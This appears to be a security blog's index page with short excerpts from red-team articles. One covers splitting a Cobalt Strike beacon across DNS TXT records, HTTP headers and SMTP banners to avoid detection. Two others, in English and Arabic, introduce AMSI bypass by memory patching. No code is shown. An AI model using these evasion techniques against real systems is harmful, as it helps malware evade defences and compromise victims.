Infiltrating CS Beacon throughout different mediums
Introduction: Hello Everyone, We all have heard of many infiltration techniques that were widely used making them easy to be detected. so we at Confidential took a step toward an infiltration technique that will make it a bit more complex in order not to be detected by any sense. Today’s article will clarify how we have infiltrated CS beacon through out different mediums.
Brief We splitted the CS beacon into multiple chunks that will be later infiltrated from different mediums (DNS txt record, custome HTTP response header, and SMTP server’s banner) using an executable agent that we will show a full demo about at the end of the article.
Memory Patching (AMSI Bypass)
Introduction Hello everyone. I think we all have faced the (Antimalware Scan Interface) or as known as the AMSI. I also belive you had some problem when loading for example a powershell modules like Mimikatz. In small words, the AMSI will be loaded in any application that uses WIN32 API. You can also check the AMSI architecture from the image below.
Overview From the image we can notice that the function that check the malicious files content is AmsiScanBuffer() and AmsiScanString().
Memory Patching (AMSI Bypass)
Introduction ألسلام عليكم معظمنا واجه ال (Antimalware Scan Interface) أو المعروفة ب `AMSI`. وغالباً واجهتم مشاكل في اي وقت حاولتم تضيفون powershell module مثل `Mimikatz` وغيرها. ال `AMSI` رح يصيرل له load في أي Application يستخدم ال `WIN32 API`. تقدرون تطلعون على ال `AMSI architecture` من الصورة الي بالأسفل Overview من الصورة نقدر نلاحظ ان ال function المسؤل عن التشيك على الملفات الخبيثة هو `AmsiScanBuffer()` و `AmsiScanString()`. نقدر نستخدم `Process Hacker` ونشوف ايش ال Modules الي جالسة تشتغل مع اي برنامج.